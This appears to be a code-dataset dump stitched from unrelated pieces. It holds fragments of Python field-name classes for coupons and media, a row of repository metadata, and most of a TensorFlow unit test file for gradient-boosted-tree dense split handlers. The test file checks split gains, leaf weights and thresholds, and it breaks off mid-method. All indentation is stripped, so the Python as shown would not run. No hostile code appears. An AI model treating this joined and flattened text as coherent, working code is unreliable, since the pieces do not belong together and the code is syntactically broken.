barcode_type = 'barcode_type'
barcode = 'barcode'
claim_limit = 'claim_limit'
coupon_type = 'coupon_type'
expiration_time = 'expiration_time'
image_url = 'image_url'
message = 'message'
reminder_time = 'reminder_time'
redemption_link = 'redemption_link'
redemption_code = 'redemption_code'
title = 'title'
class PhotoData(ValidatesFields, AbstractObject):
class Field(object):
caption = 'caption'
url = 'url'
class TextData(ValidatesFields, AbstractObject):
class Field(object):
message = 'message'
class VideoData(ValidatesFields, AbstractObject):
class Field(object):
call_to_action = 'call_to_action'
description = 'description'
image_url = 'image_url'
title = 'title'
video_id = 'video_id'
| 32.09375 | 76 | 0.691659 |
4a1b528646e7d2139d7eabb0264b8d280f8da133
| 68,682 |
py
|
Python
|
tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36 |
2016-12-17T15:25:25.000Z
|
2022-01-29T21:50:53.000Z
|
tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 59 |
2019-06-17T09:37:49.000Z
|
2022-01-19T01:21:34.000Z
|
tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36 |
2017-07-27T21:12:40.000Z
|
2022-02-03T16:45:56.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test for checking stats accumulator related ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.boosted_trees.lib.learner.batch import ordinal_split_handler
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.boosted_trees.proto import split_info_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resources
from tensorflow.python.platform import googletest
def get_empty_tensors(gradient_shape, hessian_shape):
empty_hess_shape = [1] + hessian_shape.as_list()
empty_grad_shape = [1] + gradient_shape.as_list()
empty_gradients = constant_op.constant_v1(
[], dtype=dtypes.float32, shape=empty_grad_shape)
empty_hessians = constant_op.constant_v1(
[], dtype=dtypes.float32, shape=empty_hess_shape)
return empty_gradients, empty_hessians
class DenseSplitHandlerTest(test_util.TensorFlowTestCase):
def testGenerateFeatureSplitCandidates(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight = -0.91666
# expected_left_weight * -(1.2 - 0.1)
expected_left_gain = 1.0083333333333331
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight = 0.1680672
# expected_right_weight * -(-0.5 + 0.2 + 0.1))
expected_right_gain = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.46043165467625885
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0],
0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-4 + 0.1) / (0.13 + 1)
expected_left_weight = -3.4513274336283186
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_left_gain = 13.460176991150442
expected_right_weight = 0
expected_right_gain = 0
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain = 13.460176991150442
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(0.0, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testObliviousFeatureSplitGeneration(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 1 | 3 |
# i1 | (-0.5, 0.07) | 1 | 3 |
# i2 | (1.2, 0.2) | 1 | 1 |
# i3 | (4.0, 0.13) | 2 | 2 |
dense_column = array_ops.placeholder(
dtypes.float32, shape=(4, 1), name="dense_column")
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([1, 1, 1, 2], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
weak_learner_type=learner_pb2.LearnerConfig.OBLIVIOUS_DECISION_TREE)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
# Forcing the creation of four buckets.
are_splits_ready = sess.run(
[are_splits_ready],
feed_dict={dense_column: [[0.2], [0.62], [0.3], [0.52]]})[0]
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
# Only using the last three buckets.
are_splits_ready2, partitions, gains, splits = (
sess.run(
[are_splits_ready2, partitions, gains, splits],
feed_dict={dense_column: [[0.62], [0.62], [0.3], [0.52]]}))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([1, 2], partitions)
oblivious_split_info = split_info_pb2.ObliviousSplitInfo()
oblivious_split_info.ParseFromString(splits[0])
split_node = oblivious_split_info.split_node
split_node = split_node.oblivious_dense_float_binary_split
self.assertAllClose(0.3, split_node.threshold, 0.00001)
self.assertEqual(0, split_node.feature_column)
# Check the split on partition 1.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight_1 = -0.9166666666666666
# expected_left_weight_1 * -(1.2 - 0.1)
expected_left_gain_1 = 1.008333333333333
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight_1 = 0.1680672
# expected_right_weight_1 * -(-0.5 + 0.2 + 0.1))
expected_right_gain_1 = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain_1 = 0.46043165467625896
left_child = oblivious_split_info.children[0].vector
right_child = oblivious_split_info.children[1].vector
self.assertAllClose([expected_left_weight_1], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight_1], right_child.value, 0.00001)
# Check the split on partition 2.
expected_left_weight_2 = 0
expected_left_gain_2 = 0
# -(4 - 0.1) / (0.13 + 1)
expected_right_weight_2 = -3.4513274336283186
# expected_right_weight_2 * -(4 - 0.1)
expected_right_gain_2 = 13.460176991150442
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain_2 = 13.460176991150442
left_child = oblivious_split_info.children[2].vector
right_child = oblivious_split_info.children[3].vector
self.assertAllClose([expected_left_weight_2], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight_2], right_child.value, 0.00001)
# The layer gain is the sum of the gains of each partition
layer_gain = (
expected_left_gain_1 + expected_right_gain_1 - expected_bias_gain_1) + (
expected_left_gain_2 + expected_right_gain_2 - expected_bias_gain_2)
self.assertAllClose(layer_gain, gains[0], 0.00001)
# We have examples in both partitions, then we get both ids.
self.assertEqual(2, len(oblivious_split_info.children_parent_id))
self.assertEqual(1, oblivious_split_info.children_parent_id[0])
self.assertEqual(2, oblivious_split_info.children_parent_id[1])
def testGenerateFeatureSplitCandidatesLossUsesSumReduction(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.2,
l2_regularization=2.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
loss_uses_sum_reduction=True)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
update_3 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2, update_3]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(2.4 - 0.2) / (0.4 + 2)
expected_left_weight = -0.91666
# expected_left_weight * -(2.4 - 0.2)
expected_left_gain = 2.016666666666666
# -(-1 + 0.4 + 0.2) / (0.38 + 2)
expected_right_weight = 0.1680672
# expected_right_weight * -(-1 + 0.4 + 0.2)
expected_right_gain = 0.0672268907563025
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.9208633093525178
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0],
0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-8 + 0.2) / (0.26 + 2)
expected_left_weight = -3.4513274336283186
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(0.0, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testGenerateFeatureSplitCandidatesMulticlassFullHessian(self):
with self.cached_session() as sess:
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
# Batch size is 4, 2 gradients per each instance.
gradients = array_ops.constant(
[[0.2, 0.1], [-0.5, 0.2], [1.2, 3.4], [4.0, -3.5]], shape=[4, 2])
# 2x2 matrix for each instance
hessian_0 = [[0.12, 0.02], [0.3, 0.11]]
hessian_1 = [[0.07, -0.2], [-0.5, 0.2]]
hessian_2 = [[0.2, -0.23], [-0.8, 0.9]]
hessian_3 = [[0.13, -0.3], [-1.5, 2.2]]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2, 2])
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=3,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.FULL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 1e-6)
def testGenerateFeatureSplitCandidatesMulticlassDiagonalHessian(self):
with self.cached_session() as sess:
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
# Batch size is 4, 2 gradients per each instance.
gradients = array_ops.constant(
[[0.2, 0.1], [-0.5, 0.2], [1.2, 3.4], [4.0, -3.5]], shape=[4, 2])
# Each hessian is a diagonal of a full hessian matrix.
hessian_0 = [0.12, 0.11]
hessian_1 = [0.07, 0.2]
hessian_2 = [0.2, 0.9]
hessian_3 = [0.13, 2.2]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2])
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=3,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 1e-6)
def testGenerateFeatureSplitCandidatesInactive(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, False]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([False, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# The handler was inactive, so it shouldn't return any splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testGenerateFeatureSplitCandidatesWithTreeComplexity(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.5,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight = -0.91666
# expected_left_weight * -(1.2 - 0.1)
expected_left_gain = 1.0083333333333331
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight = 0.1680672
# expected_right_weight * -(-0.5 + 0.2 + 0.1))
expected_right_gain = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.46043165467625885
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Make sure the gain is subtracted by the tree complexity regularization.
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain - 0.5,
gains[0], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-4 + 0.1) / (0.13 + 1)
expected_left_weight = -3.4513274336283186
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_left_gain = 13.460176991150442
expected_right_weight = 0
expected_right_gain = 0
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain = 13.460176991150442
# Verify candidate for partition 1, there's only one active bucket here
# so -0.5 gain is expected (because of tree complexity.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(-0.5, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testGenerateFeatureSplitCandidatesWithMinNodeWeight(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 2.0) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 2])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.5,
min_node_weight=1.5,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the gain on partition 0 to be -0.5.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
